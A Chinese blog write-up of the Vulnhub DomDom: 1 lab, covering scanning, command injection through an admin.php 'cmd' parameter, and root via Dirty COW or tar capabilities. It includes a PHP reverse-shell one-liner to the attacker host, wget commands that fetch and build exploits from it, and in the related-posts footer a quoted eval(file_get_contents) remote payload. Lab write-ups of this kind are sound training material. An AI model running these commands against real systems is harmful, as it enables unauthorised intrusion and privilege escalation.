Vulnhub靶机:DOMDOM_ 1

已于 2022-02-04 14:43:24 修改
阅读量1k 收藏 3
点赞数 1
分类专栏: 靶机 文章标签: Vulnhub
于 2022-02-04 14:41:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122783187
版权

目录

介绍

系列:DomDom(此系列仅此一台)
发布日期:2019年7月11日
难度:初级
Flag : 未知
学习:命令执行、脏牛提权
靶机地址:https://www.vulnhub.com/entry/domdom-1,328/

信息收集

主机发现

nmap -sn 192.168.40.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.40.152,只开放了80等端口。
在这里插入图片描述

测试网站

打开网站,如下图
在这里插入图片描述

没啥有价值的信息,先目录扫描走一波呢?
从靶机的描述页面中得知网站是php的,因此着重测试php

gobuster dir -u http://192.168.40.152 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 -x php

在这里插入图片描述

  1. 直接访问网站根目录,并填写所有的内容框,点击“Execute”按钮后会跳转到index.php
  2. 直接访问/admin.php得到如下图的暗语

在这里插入图片描述

  1. 测试修改请求地址

直接访问网站根目录,抓包得到(已经自动跳转到index.php)
在这里插入图片描述

修改index.phpadmin.php,得到线索,要添加cmd
在这里插入图片描述

在这里插入图片描述

命令执行-反弹shell

上文得知网站存在命令执行,靶场又是php的,就使用php反弹shell

kali开启监听:
nc -nvlp 1234

命令执行:
php -r '$sock=fsockopen("192.168.40.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

注意:命令执行的内容需要做编码,使用Ctrl+U快捷键
在这里插入图片描述

得知靶机上存在python3,获取交互式shell(如果后期使用wget下载文件失败,请退出交互式shell),通过passwd文件得知靶机上存在domom用户
在这里插入图片描述

先去domom用户的家目录溜达溜达,发现了一个文件,但是不让我看。
在这里插入图片描述

脏牛提权

下载提权脚本:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

  1. kali开启web服务:python3 -m http.server 80
  2. 靶机下载文件,并运行:
wget http://192.168.40.129/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

看到了脏牛漏洞
在这里插入图片描述

方式1

  1. 下载提权脚本:https://github.com/gbonacini/CVE-2016-5195
  2. kali开启web:python3 -m http.server 80
  3. 靶机下载提权脚本:
wget http://192.168.40.129/CVE-2016-5195-master.zip
unzip CVE-2016-5195-master.zip
cd CVE-2016-5195-master
make
./dcow -s

在这里插入图片描述

方式2

  1. kali下载exp,并开放web服务
wget https://www.exploit-db.com/download/40616
mv 40616 cowroot.c
python3 -m http.server 80

在这里插入图片描述

  1. 靶机下载文件,编译并运行
wget http://192.168.40.129/cowroot.c
gcc cowroot.c -o cowroot -pthread
chmod +x cowroot
./cowroot

在这里插入图片描述

在这里插入图片描述

其他提权方式

在之前的靶机:CONNECT THE DOTS: 1 中,介绍过使用 /sbin/getcap -r / 2>/dev/null 查找设备上特殊权限的文件,这里可以试一试。然后就发现了 tar ,嘿嘿,可以把 CONNECT THE DOTS: 1 中的提权方法抄过来
在这里插入图片描述

tar -cvf domom.tar /home/domom
tar -xvf domom.tar

打包 /home/domom,之后对其解压,经过搜寻,发现了root的密码,提权成功。
在这里插入图片描述

参考

linux Capabilities简介–#setcap cap_net_raw,cap_net_admin=eip /a.out

lainwith
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于HackMyMV靶场的靶机网络配置与下载
weixin_58368471的博客
06-10 839
BOX的适配问题
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
靶机渗透日记 domdom
Anonymous
02-08 291
ip 端口 访问80端口 目录扫描 访问 /admin.php 使用 burp 抓包 将 index.php 修改成 admin.php 添加 cmd 参数,结果返回响应的信息 反弹shell name=123&username=123&password=123&access=access&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.1..
靶机测试DomDom笔记
qq_56426046的博客
01-11 409
解决shell乱码问题,这个问题试了好久,kali上的默认shell是zsh。最后fg调出后来任务,回车得到无乱码的交互式shell。然后Ctrl+Z,把shell放到后台,在执行。本机开启个web服务,让靶机下载提权检测脚本。古有一言腰相印,谁教他、满箧婴鳞疏。登录抓包重放,发现命令执行漏洞。所以,我们先切换shell。打包用户 domom 目录。再然后获得交互shell。下载提权脚本,编译执行。
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1378
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
Vulbhub-DomDom
wwxxss
02-27 149
我们使用php代码进行建立反弹shell,因为是post传参所以对其进行url编码。我们把/index.php/index.php 改为 /admin.php。这里可以使用脏牛提权,但是我这里用新的一种查看root目录的方式,根据网站提示这是一个登录用户的界面,我们接着扫描一下网站的目录。因为靶机就开了一个80端口,因此我们只能从这三个文件中找漏洞。我们可以看见/bin/tar这说明可以对文件进行读写。开放了80端口web服务,我们访问靶机的网站。在一顿瞎试的情况下,找到了一个命令执行漏洞。
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DOMDOM0 DOM1 DOM2 DOM3
wanda000的博客
02-16 507
一、DOM全称 文档对象模型(Document Object Model) 二、DOM是什么 DOM就是一个编程接口,就是一套API。 DOM是针对HTML文档、XML等文档的一套API。就类似于JDBC是针对数据库的一套API一样。 三、DOM的用途 DOM 是用来访问或操作HTML文档、XHTML文档、XML文档中的节点元素。 现在基本上所有的浏览器都都执行了W3C发布的DOM规范,所...
DC-5靶机渗透笔记(有靶机下载链接)
qq_45900622的博客
05-29 1719
DC-5靶机下载地址:下载链接 主机发现 a.查看本kali(攻击机)ip地址 ifconfigb.扫面本攻击机本网段发现靶机 nmap -sP 192.168.6.0/24 靶机ip为192.168.6.134 扫描靶机端口确认服务 nmap -A 192.168.6.134 发现靶机开放80端口,nginx 打开浏览器访问一下瞅瞅 访问192.168.6.134 浏览一下发现就contact有个提交界面 随便提交一下 刷新一下发现页脚码的时间多次变化 … 没啥头绪,用dirbuster扫面一下靶机
vulnhub dc1
qq_55992895的博客
07-06 835
下载地址1:https://www.vulnhub.com/entry/dc-1,292/下载地址2:https://pan.baidu.com/s/15CUDP2252c_1NFzMOWUKvQ 提取码: md7x打开靶机先用nmap 扫描nmap -sN -T4 192.168.167.0/24 因为局域网内开启的主机比较多扫出了很多IP粗略看一下,有一台开放端口比较多的IP:192.168.167.42nmap -sV 192.168.167.42开启了22 80 111端口也确定这就是靶机后开始
DC8-靶机
Au
12-22 2271
下载地址 配置的环境: kali:192.168.25.131 DC8-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.129,判定为DC8-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.168.25...
Pikachu靶机系列之目录遍历、任意文件下载、敏感信息泄露、越权
来到了学渣的博客
01-17 2172
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: Pikachu靶机系列之安装环境 Pikachu靶机系列之暴力破解(一) Pikachu靶机系列之暴破(二):token防爆破 Pikachu靶机系列之XSS(Cross-Site Scripting) Pikachu靶机系列之CSRF(Cross...
metasploit上线windows2016靶机
qq_53030229的博客
05-17 634
文章目录一、生成后门二、windows2016靶机下载后门1、首先,我们需要开启apache2,然后将后门放入/var/www/html目录下2、windows2016下载后门程序三、设置监听1、开启metasploit2、设置监听模块四、上线windows2016靶机 攻击机:kali 靶机:windows2016 一、生成后门 由于这个后门没有经过免杀,所以需要你们把windows2016防火墙关闭,你们·可以·自己去学习一下免杀 msfvenom -p windows/meterpreter/reve
billu_b0x[靶机]
weixin_43736033的博客
03-14 668
主机发现: 主机探测: 访问80端口 利用sqlmap 跑了一下post 无果 用dirb爆破目录 访问in.php 找到配置文件路径 尝试过这个文件上传,没用 有点像文件包含 尝试payload : http://192.168.222.135/test.php?file=test.php 没有用 用bp抓包切换成post方式 发现文件包含 利用文件包含读取 c.php时发现 ...
vulnhub靶机DC1
weixin_52450702的博客
10-29 893
靶机DC1IP:192.168.70.160。
OWASP靶机下载安装详细过程
热门推荐
xxx_Python的博客
05-22 2万+
OWASP靶机下载安装详细过程一、 OWASP靶机下载二、 VM虚拟机三、 OWASP安装四、 OWASP启动运行 一、 OWASP靶机下载 下载地址:https://sourceforge.net/projects/owaspbwa/files/. 一般可直接点击“Download Latest Version”下载最新版本的OWASP靶机 二、 VM虚拟机 安装可自行上网查看安装教程,本次使用VM15pro 三、 OWASP安装 保证磁盘容量有10G左右或以上,解压下载的OWASP压缩包 打开VM虚
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值